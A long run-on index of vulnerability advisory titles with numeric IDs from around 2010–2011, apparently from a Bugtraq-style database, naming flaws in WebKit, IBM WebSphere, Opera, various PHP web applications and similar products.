SAP Web Application Server WEBRFC ICF Service Cross-Site Scripting Vulnerability [49645] SAP WebAS 'cachetest' Service Denial of Service Vulnerability [49643] IBM WebSphere Commerce Activity Token Authentication Unspecified Security Vulnerability [49642] SAP WebAS Malicious SAP Shortcut Generation Remote Command Injection Vulnerabiltiy [49544] Xataface WebAuction and Librarian DB Multiple Input Validation Vulnerabilities [49496] Website Baker Unspecified Cross Site Scripting Vulnerability [49428] BroadWin WebAccess Client 'bwocxrun.ocx ' Multiple Remote Vulnerabilities [49399] Web Professional 'default.php' SQL Injection Vulnerability [49393] TinyWebGallery Local File Include and SQL Injection Vulnerabilities [49389] IBM WebSphere Application Server Tomcat Webdav Servlet Unspecified Vulnerability [49388] Opera Web Browser Information Disclosure Vulnerability [49363] Babelweb 'user' Option Local Privilege Escalation Weakness [49362] IBM WebSphere Application Server Administration Console Information Disclosure Vulnerability [49354] phpWebSite 'mod.php' SQL Injection Vulnerability [49350] WebKit Unspecified Memory Corruption Remote Code Execution Vulnerability [49345] HP SiteScope Administration Interface Security Bypass Vulnerability [49240] IBM WebSphere Service Registry and Repository 'agentDetect.jsp' Cross Site Scripting Vulnerability [49239] Mozilla Firefox and Thunderbird CVE-2011-2989 WebGL Memory-Corruption Vulnerabiility [49229] RoundCube Webmail '_mbox' Parameter Cross Site Scripting Vulnerability [49185] Website Baker 'upload.php' Arbitrary File Upload Vulnerability [49176] phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability [49137] Open Handset Alliance Android Web Browser Secure Cookie Security Bypass Vulnerability [49134] Opera Web Browser Secure Cookie Security Bypass Vulnerability [49112] HP webOS Calendar Application Remote Script Code Injection Vulnerability [49111] HP webOS Contacts Application CVE-2011-2408 Remote Script Code Injection Vulnerability [49040] Microsoft Remote Desktop Web Access CVE-2011-1263 Cross Site Scripting Vulnerability [49001] Drupal iWebkit Theme Menu Links HTML Injection Vulnerability [48921] MyWebServer dot Character Remote Script File Disclosure Vulnerability [48920] MyWebServer Remote Buffer Overflow Vulnerability [48898] Citrix XenApp and XenDesktop XML Service Interface Multiple Remote Code Execution Vulnerabilities [48878] Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability [48860] WebKit URL Handling Information Disclosure Vulnerability [48859] WebKit Embedded URL Cross Domain Scripting Vulnerability [48858] WebKit CVE-2011-1797 Memory Corruption Remote Code Execution Vulnerability [48857] WebKit CVE-2011-1462 Memory Corruption Remote Code Execution Vulnerability [48856] WebKit CVE-2011-1457 Memory Corruption Remote Code Execution Vulnerability [48855] WebKit CVE-2011-1453 Memory Corruption Remote Code Execution Vulnerability [48854] WebKit CVE-2011-1288 Memory Corruption Remote Code Execution Vulnerability [48853] WebKit CVE-2011-0255 Memory Corruption Remote Code Execution Vulnerability [48852] WebKit 'NamedNodeMap.cpp' Memory Corruption Remote Code Execution Vulnerability [48851] WebKit CVE-2011-0253 Memory Corruption Remote Code Execution Vulnerability [48850] WebKit CVE-2011-0238 Memory Corruption Remote Code Execution Vulnerability [48849] WebKit CVE-2011-0237 Memory Corruption Remote Code Execution Vulnerability [48848] WebKit CVE-2011-0235 Memory Corruption Remote Code Execution Vulnerability [48847] WebKit FrameOwner Element Memory Corruption Remote Code Execution Vulnerability [48846] WebKit CVE-2011-0232 Memory Corruption Remote Code Execution Vulnerability [48845] WebKit CVE-2011-0225 Memory Corruption Remote Code Execution Vulnerability [48844] WebKit CVE-2011-0222 Memory Corruption Remote Code Execution Vulnerability [48843] WebKit CVE-2011-0221 Memory Corruption Remote Code Execution Vulnerability [48842] WebKit CVE-2011-0218 Memory Corruption Remote Code Execution Vulnerability [48840] WebKit 'libxslt' Remote Code Execution Vulnerability [48839] Apple Safari 'AutoFill web forms' Feature Information Disclosure Vulnerability [48829] IcedTea6 and IcedTea-Web Information Disclosure and Security Bypass Vulnerabilities. [48827] WebKit SVG Tags 'animVal' Property Use-After-Free Remote Code Execution Vulnerability [48825] WebKit Malformed 'TIFF' Image Use After Free Memory Corruption Vulnerability [48824] WebKit MathML Tags Use-After-Free Remote Code Execution Vulnerability [48823] WebKit Malformed XHTML Tags Use After Free Memory Corruption Vulnerability [48820] WebKit Frameset Elements Memory Corruption Vulnerability [48710] IBM WebSphere Application Server 'logoutExitPage' Parameter Security Bypass Vulnerability [48709] IBM WebSphere Application Server Administration Console Local Information Disclosure Vulnerability [48683] Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability [48679] Hitachi JP1/Performance Management Web Console Unspecified Cross-Site Scripting Vulnerability [48636] IBM WebSphere MQ CDP Extension Revoked SSL Certificate Validation Security Bypass Vulnerability [48634] Opera Web Browser Prior to 11.10 Multiple Security Weaknesses [48613] HP webOS Contacts Application Multiple Cross Site Scripting Vulnerabilities [48579] F5 BIG-IP ASM Web Scraping Cross-Site Scripting Vulnerability [48570] Opera Web Browser Prior to 11.11 Multiple Remote Denial of Service Vulnerabilities [48569] Opera Web Browser Prior to 11.10 Multiple Remote Denial of Service Vulnerabilities [48568] Opera Web Browser CVE-2011-2610 Unspecified Security Vulnerability [48556] Opera Web Browser Multiple Remote Denial of Service Vulnerabilities [48555] WeBid Local File Include and SQL Injection Vulnerabilities [48554] WeBid 'converter.php' Multiple Remote PHP Code Injection Vulnerabilities [48550] iMesh 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability [48546] WebCalendar Multiple Cross Site Scripting Vulnerabilities [48501] Opera Web Browser URL Handling Denial of Service Vulnerability [48500] Opera Web Browser Unspecified Cross Site Scripting Vulnerability [48476] RealityServer Web Services RTMP Server NULL Pointer Dereference Denial Of Service Vulnerability [48414] WebCAT 'cms_view.php' Multiple SQL Injection Vulnerabilities [48406] NetServe Web Server Multiple Security Vulnerabilities [48375] Mozilla Firefox WebGL Invalid Write Remote Code Execution Vulnerability [48371] Mozilla Firefox WebGL Out of Bound Read Information Disclosure Vulnerability [48370] IBM Web Application Firewall Security Bypass Vulnerability [48362] CIDWeb Multiple Cross Site Scripting Vulnerabilities [48338] WeblyGo Unspecified Cross Site Scripting Vulnerability [48324] WeBid 'adsearch.php' HTML Injection Vulnerability [48323] Hitachi Web Server Unspecified Remote Denial of Service Vulnerability [48319] Mozilla Firefox WebGL Information Disclosure Vulnerability [48318] Symantec Web Gateway Management GUI 'forget.php' SQL Injection Vulnerability [48305] IBM WebSphere Application Server Administration Console Cross Site Request Forgery Vulnerability [48262] Opera Web Browser 11.11 Denial of Service Vulnerability [48233] WebFileExplorer 'user' and 'pass' SQL Injection Vulnerabilities [48175] Microsoft Active Directory Certificate Services Web Enrollment Cross-Site Scripting Vulnerability [48116] Simple web-server Directory Traversal Vulnerability [48102] WebSVN 'path' Parameter Remote Command Injection Vulnerability [48082] CodeMeter WebAdmin 'Licenses.html' Cross Site Scripting Vulnerability [48062] Imperva SecureSphere Web Application Firewall And MX Management Server HTML Injection Vulnerability [48044] IBM Web Content Management Authoring Tool Component Security Bypass Vulnerability [48041] IBM Web Content Management Race Condition Denial Of Service Vulnerability [48040] IBM WebSphere Portal 'OutputMediator' Objects Denial Of Service Vulnerability [48002] WebDefend Enterprise Manager Appliance Hard Coded Authentication Security Bypass Vulnerability [48000] Eucalyptus SOAP Interface Remote Arbitrary Command Injection Vulnerability [47985] Cisco RVS4000 and WRVS4400N Web Management Private/Public Key's Information Disclosure Vulnerability [47983] Cisco IOS XR SPA Interface Processor Remote Denial of Service Vulnerability [47979] Cisco CDS Internet Streamer Web Server Remote Denial of Service Vulnerability [47970] MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities [47954] IBM WebSphere Portal Search Center Unspecified Cross Site Scripting Vulnerability [47915] Drupal Webform Module Cross Site Scripting and Arbitrary File Upload Vulnerabilities [47906] Opera Web Browser Frameset Constructs Memory Corruption Vulnerability [47876] Web File Browser Arbitrary File Upload Vulnerability [47874] Mitel Audio and Web Conferencing Multiple Cross Site Scripting Vulnerabilities [47842] InduSoft Web Studio Directory Traversal Vulnerability [47831] IBM WebSphere Application Server WS-Security XML Encryption Weakness [47830] Google Chrome WebKit Glue Bad Cast Remote Code Execution Vulnerability [47829] Trustwave WebDefend Enterprise Multiple Information Disclosure Vulnerabilities [47788] HP webOS Plug-in Development Kit (PDK) Remote Script Code Injection Vulnerability [47787] HP WebOS Email Application Multiple HTML Injection Vulnerabilities [47764] Opera Web Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability [47759] phpWebSite 'upload.php' Arbitrary File Upload Vulnerability [47753] BlueVoda Website Builder '.bvp' File Stack-Based Buffer Overflow Vulnerability [47704] ICONICS WebHMI ActiveX Control Stack Buffer Overflow Vulnerability [47703] Horizon WEB BUILDER 'fshow.php' SQL Injection Vulnerability [47682] Web Auction 'lang' Parameter Cross Site Scripting Vulnerability [47672] LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability [47661] WebGL Library Multiple Memory Corruption Vulnerabilities [47601] Trustwave WebDefend Local Privilege Escalation Vulnerability [47599] up.time Software Administration Interface Remote Authentication Bypass Vulnerability [47593] Football Website Manager SQL Injection and Multiple HTML Injection Vulnerabilities [47588] Computer Associates Arcot WebFort VAS Unspecified URI Redirection Vulnerability [47587] CA Arcot WebFort Versatile Authentication Server Cross Site Scripting Vulnerability [47586] Hitachi Web Server 'RequestHeader' Directive Information Disclosure Vulnerability [47585] Hitachi Web Server SSL/TLS Protocol Information Disclosure Vulnerability [47573] webERP 'AccountGroups.php' Cross Site Scripting Vulnerability [47560] DynMedia Pro Web CMS 'downloadfile.php' Local File Disclosure Vulnerability [47559] 360 Web Manager 'assetmanager.php' Multiple Arbitrary File Access Vulnerabilities [47558] Webmin 'useradmin/index.cgi' Local Privilege Escalation Vulnerability [47539] web2Project 'calendar.php' SQL Injection Vulnerability [47537] Asterisk Manager Interface Arbitrary Command Execution Security Bypass Vulnerability [47521] CA Output Management Web Viewer Multiple Stack Based Buffer Overflow Vulnerabilities [47500] webSPELL Multiple Cross-Site Scripting Vulnerabilities [47495] WebKit Malformed SVG Document Processing Remote Code Execution Vulnerability [47487] Oracle Java System Access Manager Policy Agent CVE-2011-0846 Remote Web Proxy Agent Vulnerability [47482] WebKit Detached Body Element Remote Code Execution Vulnerability [47474] WebKit Undefined DOM Prototype Attachment Remote Code Execution Vulnerability [47434] Oracle E-Business Suite CVE-2011-0809 Web ADI Remote Vulnerability [47409] WebKit 'CSSComputedStyleDeclaration.cpp' Null Pointer Dereference Denial of Service Vulnerability [47375] Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross Site Scripting Vulnerability [47357] Computer Associates Total Defense Heartbeat Web Service Remote Code Execution Vulnerability [47332] Website Baker Multiple SQL Injection Vulnerabilities [47328] WebCalendar Multiple Cross Site Scripting Vulnerabilities [47324] BlackBerry Enterprise Server Web Desktop Manager Component Cross Site Scripting Vulnerability [47271] Cyber-Ark PIM Suite Password Vault Web Access Cross Site Scripting Vulnerability [47247] RoundCube Webmail Remote Mail Relay Vulnerability [47165] WebCalendar 'edit_entry_handler.php' Multiple Cross Site Scripting Vulnerabilities [47122] IBM WebSphere Application Server for z/OS Local Unauthorized Access Vulnerability [47120] IBM WEBi Cross Site Scripting And Information Disclosure Vulnerabilities [47072] Easy File Sharing Web Server Multiple Security Vulnerabilities [47065] webEdition CMS 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability [47050] wodWebServer.NET Directory Traversal Vulnerability [47047] webEdition CMS HTML Injection and Local File Include Vulnerabilities [47020] Webkit Address Bar URI Spoofing Vulnerability [47017] Ripe Website Manager Cross Site Scripting and Multiple SQL Injection Vulnerabilities [47013] Drupal Webform Block Module Cross Site Scripting Vulnerability [47008] Advantech/BroadWin SCADA WebAccess Multiple Remote Security Vulnerabilities [46932] Web Poll Pro 'error' Parameter HTML Injection Vulnerability [46910] Fake Webcam '.wmv' File Processing Remote Denial of Service Vulnerability [46897] Asterisk Manager Interface Remote Denial of Service Vulnerability [46877] CMS WebManager-Pro 'menu_id' Parameter Cross Site Scripting Vulnerability [46872] Opera Web Browser Window Null Pointer Dereference Denial of Service Vulnerability [46870] SSWebPlus 'idx' Parameter SQL Injection Vulnerability [46864] Trend Micro WebReputation API URI Security Bypass Vulnerability [46849] WebKit Style Handling Memory Corruption Vulnerability [46829] LMS Web Ensino Multiple Input Validation Vulnerabilities [46822] WebKit WBR Tags Use-After-Free Remote Code Execution Vulnerability [46816] WebKit Local Webpage Cross Domain Information Disclosure Vulnerability [46814] WebKit 'Attr.style' Accessor Cross Domain Script Injection Vulnerability [46811] WebKit 'HTML5' Drag and Drop Cross-Origin Information Disclosure Vulnerability [46809] WebKit 'window.console._inspectorCommandLineAPI' Property Cross Domain Scripting Vulnerability [46808] WebKit CVE-2011-0160 Unspecified Memory Corruption Vulnerability [46807] WebKit CVE-2011-0157 Unspecified Memory Corruption Vulnerability [46765] Bacula-web 'report.php' Cross Site Scripting and SQL Injection Vulnerabilities [46757] WellinTech KingView 'KVWebSvr.dll' ActiveX Control Heap Buffer Overflow Vulnerability [46749] WebKit CVE-2011-0133 Glyph Data Memory Corruption Vulnerability [46748] WebKit 'Runin' Box CVE-2011-0132 Use-After-Free Memory Corruption Vulnerability [46747] WebKit CVE-2011-0116 'setOuterText()' Method Memory Corruption Remote Code Execution Vulnerability [46746] WebKit Range Object Remote Code Execution Vulnerability [46745] WebKit CVE-2011-0154 Javascript 'sort()' Method Memory Corruption Vulnerability [46744] WebKit CVE-2011-0149 'HTMLBRElement' Style Memory Corruption Vulnerability [46742] Maian Weblog 'index.php' SQL Injection Vulnerability [46736] IBM WebSphere Application Server prior to 7.0.0.15 Multiple Security Vulnerabilities [46728] WebKit CVE-2011-0113 Unspecified Memory Corruption Vulnerability [46727] WebKit CVE-2011-0126 Unspecified Memory Corruption Vulnerability [46726] WebKit CVE-2011-0112 Unspecified Memory Corruption Vulnerability [46725] WebKit CVE-2011-0124 Unspecified Memory Corruption Vulnerability [46724] WebKit CVE-2011-0156 Unspecified Memory Corruption Vulnerability [46723] WebKit CVE-2011-0122 Unspecified Memory Corruption Vulnerability [46722] WebKit CVE-2011-0168 Unspecified Memory Corruption Vulnerability [46721] WebKit CVE-2011-0155 Unspecified Memory Corruption Vulnerability [46720] WebKit CVE-2011-0153 Unspecified Memory Corruption Vulnerability [46719] WebKit CVE-2011-0151 Unspecified Memory Corruption Vulnerability [46718] WebKit CVE-2011-0152 Unspecified Memory Corruption Vulnerability [46717] WebKit CVE-2011-0150 Unspecified Memory Corruption Vulnerability [46716] WebKit CVE-2011-0165 Unspecified Memory Corruption Vulnerability [46715] WebKit CVE-2011-0146 Unspecified Memory Corruption Vulnerability [46714] WebKit CVE-2011-0140 Unspecified Memory Corruption Vulnerability [46713] WebKit CVE-2011-0138 Unspecified Memory Corruption Vulnerability [46712] WebKit CVE-2011-0139 Unspecified Memory Corruption Vulnerability [46711] WebKit CVE-2011-0134 Unspecified Memory Corruption Vulnerability [46710] WebKit CVE-2011-0145 Unspecified Memory Corruption Vulnerability [46709] WebKit CVE-2011-0135 Unspecified Memory Corruption Vulnerability [46708] WebKit CVE-2011-0148 Unspecified Memory Corruption Vulnerability [46707] WebKit CVE-2011-0137 Unspecified Memory Corruption Vulnerability [46706] WebKit CVE-2011-0142 Unspecified Memory Corruption Vulnerability [46705] WebKit CVE-2011-0127 Unspecified Memory Corruption Vulnerability [46704] WebKit CVE-2011-0131 Unspecified Memory Corruption Vulnerability [46703] WebKit CVE-2011-0164 Unspecified Memory Corruption Vulnerability [46702] WebKit CVE-2011-0147 Unspecified Memory Corruption Vulnerability [46701] WebKit CVE-2011-0125 Unspecified Memory Corruption Vulnerability [46700] WebKit CVE-2011-0130 Unspecified Memory Corruption Vulnerability [46699] WebKit CVE-2011-0144 Unspecified Memory Corruption Vulnerability [46698] WebKit CVE-2011-0123 Unspecified Memory Corruption Vulnerability [46696] WebKit CVE-2011-0121 Unspecified Memory Corruption Vulnerability [46695] WebKit CVE-2011-0143 Unspecified Memory Corruption Vulnerability [46694] WebKit CVE-2011-0120 Unspecified Memory Corruption Vulnerability [46693] WebKit CVE-2011-0129 Unspecified Memory Corruption Vulnerability [46692] WebKit CVE-2011-0128 Unspecified Memory Corruption Vulnerability [46691] WebKit CVE-2011-0114 Unspecified Memory Corruption Vulnerability [46690] WebKit CVE-2011-0136 Unspecified Memory Corruption Vulnerability [46689] WebKit CVE-2011-0141 Unspecified Memory Corruption Vulnerability [46688] WebKit CVE-2011-0119 Unspecified Memory Corruption Vulnerability [46687] WebKit CVE-2011-0118 Unspecified Memory Corruption Vulnerability [46686] WebKit CVE-2011-0117 Unspecified Memory Corruption Vulnerability [46684] WebKit CVE-2011-0111 Unspecified Memory Corruption Vulnerability [46677] WebKit SVG styles Use-after-free Memory Corruption Vulnerability [46673] phpWebSite 'local' Parameter Cross Site Scripting Vulnerability [46655] pywebdav MySQL Authentication Module SQL Injection Vulnerability [46654] RETIRED: WebKit Multiple Memory Corruption Vulnerabilities [46595] HP Web Jetadmin Unspecified Local Security Bypass Vulnerability [46577] WebKit 'HistoryController' Denial of Service Vulnerability [46566] web.go 'get_secure_cookie' Unauthorized Access Vulnerability [46547] F-Secure Policy Manager 'WebReporting' Module Cross Site Scripting Vulnerability [46503] DIY Web CMS Cross Site Scripting and Multiple SQL Injection Vulnerabilities [46490] Aptdaemon D-Bus Interface Local Security Bypass Vulnerability [46468] PIPI Player 'PIPIWebPlayer.ocx' ActiveX Multiple Buffer Overflow Vulnerabilities [46449] IBM WebSphere Application Server Login Module Security Bypass Vulnerability [46423] Ruby on Rails 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability [46374] A1 Website Download 'fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability [46341] webERP 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability [46303] CGI:IRC 'nonjs' Interface Cross Site Scripting Vulnerability [46250] WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability [46162] Microsoft Windows Azure Web Role Information Disclosure Vulnerability [46160] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability [46131] Web Wiz Forums Multiple SQL Injection Vulnerabilities [46086] TinyWebGallery Cross Site Scripting and Local File Include Vulnerabilities [46078] Cisco WebEx ATP File Remote Stack Buffer Overflow Vulnerability [46075] Cisco WebEx WRF and ARF File Format Multiple Remote Buffer Overflow Vulnerabilities [46067] web@all Multiple Cross Site Scripting and SQL Injection Vulnerabilities [46054] Weborf 'get_param_value()' Function HTTP Header Handling Denial Of Service Vulnerability [46036] Opera Web Browser Multiple Security Vulnerabilities [46015] AB WEB CMS 'ab_gp_detail.php' Cross Site Scripting and SQL Injection Vulnerabilities [46003] Opera Web Browser 'option' HTML Element Integer Overflow Vulnerability [45989] IBM WebSphere Portal and Workplace Web Content Management Information Disclosure Vulnerability [45985] ActiveWeb Professional Arbitrary File Upload Vulnerability [45976] web@all 'url' Parameter Cross Site Scripting Vulnerability [45951] Opera Web Browser 'Select' HTML Element Integer Overflow Vulnerability [45923] IBM WebSphere MQ Header Field Remote Buffer Overflow Vulnerability [45896] Oracle Sun Java System Communications Express CVE-2010-4456 Remote Web Mail Vulnerability [45877] Oracle Fusion Middleware CVE-2010-4453 Remote Oracle WebLogic Server Vulnerability [45852] Oracle Weblogic CVE-2010-4437 Remote Session Fixation Vulnerability [45847] Oracle WebLogic Server CVE-2010-3510 Remote Security Vulnerability [45827] Advanced Webhost Billing System 'oid' Parameter SQL Injection Vulnerability [45802] IBM WebSphere Application Server CVE-2011-0315 Cross Site Scripting Vulnerability [45801] IBM WebSphere MQ Invalid Message Remote Buffer Overflow Vulnerability [45800] IBM WebSphere Application Console Servlets Information Disclosure Vulnerability [45783] InduSoft NTWebServer Web Service Stack-Based Buffer Overflow Vulnerability [45742] Symantec Web Gateway Management GUI SQL Injection Vulnerability [45734] Drupal Webform Module Unspecified SQL Injection Vulnerability [45722] WebKit CSS Token Sequences Handling Denial of Service Vulnerability [45721] Webkit SVG Out of Bound Array Denial of Service Vulnerability [45720] WebKit Text Editing Use After Free Memory Corruption Vulnerability [45719] WebKit Large Text Area (CVE-2010-4198) Denial of Service Vulnerability [45718] Webkit Frame Object Denial of Service Vulnerability [45639] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [45613] Yektaweb Academic Web Tools CMS 'browse.php' Cross Site Scripting Vulnerability [45585] IBM WebSphere Service Registry and Repository Authentication Bypass Vulnerability [45568] Appweb Web Server Cross Site Scripting Vulnerability [45567] HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability [45537] Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability [45519] PHP Web Scripts Ad Manager Pro 'pageId' Parameter SQL Injection Vulnerability [45515] Inout Webmail 'emailfilter' Value HTML Injection Vulnerability [45476] Alt-N WebAdmin Remote Source Code Information Disclosure Vulnerability [45461] Opera Web Browser Prior to 11.00 Multiple Security Vulnerabilities [45439] Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities [45373] Clear iSpot/Clearspot 'cgi-bin/webmain.cgi' Cross Site Request Forgery Vulnerability [45340] Helix Server Administration Interface Cross Site Request Forgery Vulnerability [45318] Microsoft Windows Consent User Interface Registry Key Local Privilege Escalation Vulnerability [45310] Google Web Optimizer Control Script Cross Site Scripting Vulnerability [45292] IBM WebSphere Commerce Outbound Messaging System Information Disclosure Vulnerability [45247] HP webOS Contacts Application vCard Remote Script Code Injection Vulnerability [45199] WebEx Meeting Manager WebexUCFObject ActiveX DLL Loading Arbitrary Code Execution Vulnerability [45184] HotWeb Scripts HotWeb Rentals 'resorts.asp' SQL Injection Vulnerability [45172] Palm WebOS Contacts Application HTML Injection Vulnerability [45105] Kerio Control Web Filter Unspecified Remote Security Vulnerability [45089] MicroNetSoft RV Dealer Websites Multiple SQL Injection Vulnerabilities [45066] PHP Web Scripts Easy Banner Free Multiple SQL Injection and HTML Injection Vulnerabilities [45025] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities [45019] webApp.secure 'Content-Length' Remote Denial Of Service Vulnerability [45008] WebKit (CVE-2010-3829) HTML 'Link' DNS Pre-Fetching Security Bypass Vulnerability [44971] WebKit Colors in SVG Documents Remote Code Execution Vulnerability [44970] WebKit SVG Document Use-After-Free Remote Code Execution Vulnerability [44969] WebKit Geolocation Objects Use-After-Free Remote Code Execution Vulnerability [44967] WebKit Cascading Style Sheet(CSS) 3D Transforms Remote Code Execution Vulnerability [44965] WebKit Inline Text Boxes Remote Code Execution Vulnerability [44964] WebKit Element Scrollbars Use-After-Free Remote Code Execution Vulnerability [44963] WebKit Cascading Style Sheet Boxes Remote Code Execution Vulnerability [44962] WebKit (CVE-2010-3822) CSS Counter Styles Remote Code Execution Vulnerability [44961] WebKit (CVE-2010-3821) Cascading Style Sheets (CSS) Remote Code Execution Vulnerability [44960] WebKit 'Text' Objects Integer Overflow Remote Code Execution Vulnerability [44959] WebKit (CVE-2010-3820) Editable Elements Remote Code Execution Vulnerability [44958] WebKit Element Attributes Use-After-Free Remote Code Execution Vulnerability [44957] WebKit Inline Styling Command Remote Code Execution Vulnerability [44956] WebKit WebSockets Integer Overflow Remote Code Execution Vulnerability [44955] WebKit Edit Command Remote Code Execution Vulnerability [44954] WebKit HTML 'Link' DNS Pre-Fetching Security Bypass Vulnerability [44953] WebKit 'History' Object Same Origin Validation Bypass Vulnerability [44952] WebKit Insufficient Entropy Random Number Generator Weakness [44950] WebKit String Integer Overflow Remote Code Execution Vulnerability [44931] WebRCSdiff 'viewver.php' Remote File Include Vulnerability [44913] IBM WebSphere MQ FDC Processing Denial Of Service Vulnerability [44888] openEngine 'website.php' Local File Include and Cross Site Scripting Vulnerabilities [44875] IBM WebSphere Application Server Unspecified Cross Site Scripting Vulnerability [44865] IBM WebSphere Commerce Unspecified SQL Injection Vulnerability [44863] Webmatic 'p' Parameter SQL Injection Vulnerability [44862] IBM WebSphere Application Server JAX-WS Denial Of Service Vulnerability [44857] IBM WebSphere Portal 'SemanticTagService.js' Cross Site Scripting Vulnerability [44783] QtWeb Browser Buffer Overflow Vulnerability [44772] Ricoh Web Image Monitor Cross Site Scripting Vulnerability [44771] WebM libvpx Unspecified Memory Corruption Vulnerability [44770] Babylon Translation Interface Cross Domain Script Injection Vulnerability [44765] WeBid Multiple Input Validation Vulnerabilities [44670] IBM WebSphere Application Server CVE-2010-0783 Unspecified Cross Site Scripting Vulnerability [44647] Webkit SVG Document CVE-2010-1822 Remote Denial of Service Vulnerability [44632] Microsoft Forefront Unified Access Gateway Web Monitor Cross-Site Scripting Vulnerability [44598] Webmedia Explorer HTML Injection Vulnerability [44591] CMS WebManager-Pro Cross Site Scripting and SQL Injection Vulnerabilities [44586] Mongoose Web Server URI Directory Traversal Vulnerability [44546] Webradev Download Protect 'GLOBALS[RootPath]' Parameter Multiple Remote File Include Vulnerabilities [44510] 212cafe WebBoard 'view.php' Directory Traversal Vulnerability [44506] Weborf HTTP Request Denial Of Service Vulnerability [44487] HP LoadRunner Web Tours Unspecified Denial of Service Vulnerability [44479] HP Palm Pre webOS API Local Privilege Escalation Vulnerability [44478] HP Palm webOS Camera Local Unauthorized Access Vulnerability [44473] HP Palm Pre webOS Doc Viewer Remote Code Execution Vulnerability [44468] Cisco CiscoWorks Common Services Web Server Module Buffer Overflow Vulnerability [44388] WebAsys Shop-Script Pro 'current_currency' Parameter SQL Injection Vulnerability [44371] WebEyes Guest Book 'yorum.asp' SQL Injection Vulnerability [44368] WebCal 'webCal3_detail.asp' SQL Injection Vulnerability [44342] IBM WebSphere MQ Subject Distinguished Name (DN) X.509 Certificate Spoofing Vulnerability [44216] WebKit CVE-2010-3248 Unspecified Security Vulnerability [44206] WebKit Images Cross Domain Information Disclosure Vulnerability [44204] WebKit CVE-2010-3257 Stale Pointer Denial of Service Vulnerability [44203] Webkit History Feature Address Bar URI Spoofing Vulnerability [44201] WebKit Cast Operation CVE-2010-3114 Memory Corruption Vulnerability [44200] WebKit MIME Type Handling CVE-2010-3116 Memory Corruption Vulnerability [44199] WebKit SVG CVE-2010-3113 Memory Corruption Vulnerability [44152] RETIRED: Wiki Web Help Insecure Cookie Authentication Bypass Vulnerability [44139] AdaptWeb Local File Include and SQL Injection Vulnerabilities [44123] Attachmate Reflection for the Web Cross Site Scripting Vulnerability [44111] OpenConnect 'webvpn' Cookie Debugging Output Information Disclosure Vulnerability [44040] Oracle Java SE and Java for Business CVE-2010-3550 Remote Java Web Start Vulnerability [44034] Oracle Oracle iPlanet Web Server (Sun Java System Web Server) CVE-2010-3512 Remote Vulnerability [44021] Oracle Java SE and Java for Business CVE-2010-3558 Remote Java Web Start Vulnerability [44004] Oracle iPlanet Web Server CVE-2010-3514 Remote Security Vulnerability [43984] Oracle iPlanet Web Server CVE-2010-3545 Administration Remote Vulnerability [43977] Oracle iPlanet Web Server CVE-2010-3544 Administration Remote Vulnerability [43968] Oracle Sun Convergence CVE-2010-3579 Webmail Remote Security Vulnerability [43963] Oracle Communications Messaging Server CVE-2010-3564 Webmail Remote Vulnerability [43931] Oracle WebLogic Server Node Manager UNC Path Remote Security Vulnerability [43920] Opera Web Browser Prior to 10.63 Multiple Security Vulnerabilities [43895] WebChess Multiple SQL Injection and Cross Site Scripting Vulnerabilities [43880] WebNMS Framework 'ReportViewAction.do' Cross Site Scripting Vulnerability [43875] IBM WebSphere Application Server Unspecified Cross Site Request Forgery Vulnerability [43874] IBM WebSphere Application Server for z/OS Multiple Unspecified Cross Site Scripting Vulnerabilities [43864] xWeblog 'tarih' Parameter SQL Injection Vulnerability [43858] xWeblog 'makale_id' Parameter SQL Injection Vulnerability [43854] Fretsweb Multiple SQL Injection Vulnerabilities [43713] Uebimiau Webmail 'stage' Parameter Local File Include Vulnerability [43679] SurgeMail SurgeWeb Cross Site Scripting Vulnerability [43661] WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability [43636] Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities [43608] webSPELL SQL Injection and Open Email Relay Vulnerabilities [43607] Opera Web Browser 10.62 and prior Multiple Security Vulnerabilities [43580] webSPELL 'staticID' Parameter SQL Injection Vulnerability [43579] webSPELL 'asearch.php' SQL Injection Vulnerability [43576] webSPELL 'webspell_settings.php' SQL Injection Vulnerability [43571] Fretsweb Multiple Local File Include Vulnerabilities [43558] WebLeague 'profile.php' SQL Injection Vulnerability [43557] WebLeague Multiple SQL Injection Vulnerabilities [43547] WebAvail Aleza Portal 'alezalogin' Cookie Parameter SQL Injection Vulnerability [43525] Tinx-IT WebVision 'news.php' SQL Injection Vulnerability [43515] Horde IMP Webmail 'fetchmailprefs.php' HTML Injection Vulnerability [43494] Web TV 'chn' Parameter Cross Site Scripting Vulnerability [43475] FreeWebScriptz Freelancer Script Multiple Cross Site Scripting Vulnerabilities [43474] FreeWebScriptz HUBScript 'single_winner1.php' Cross Site Scripting Vulnerability [43429] WebShop Hun 'index.php' Local File Include and Cross Site Scripting Vulnerabilities [43425] IBM WebSphere Application Server Administration Console Remote Denial Of Service Vulnerability [43406] RSA Authentication Agent for Web Directory Traversal Vulnerability [43380] WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross Site Scripting Vulnerability [43356] Basic Web Server Directory Traversal and Denial of Service Vulnerabilities [43339] Gonafish WebStatCaffe Multiple Cross Site Scripting Vulnerabilities [43312] Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities [43254] Willscript Auction Website Script 'category.php' SQL Injection Vulnerability [43245] Multi Website 'search' Parameter HTML Injection Vulnerability [43243] Multi Website 'Browse' Parameter SQL Injection Vulnerability [43230] Axigen 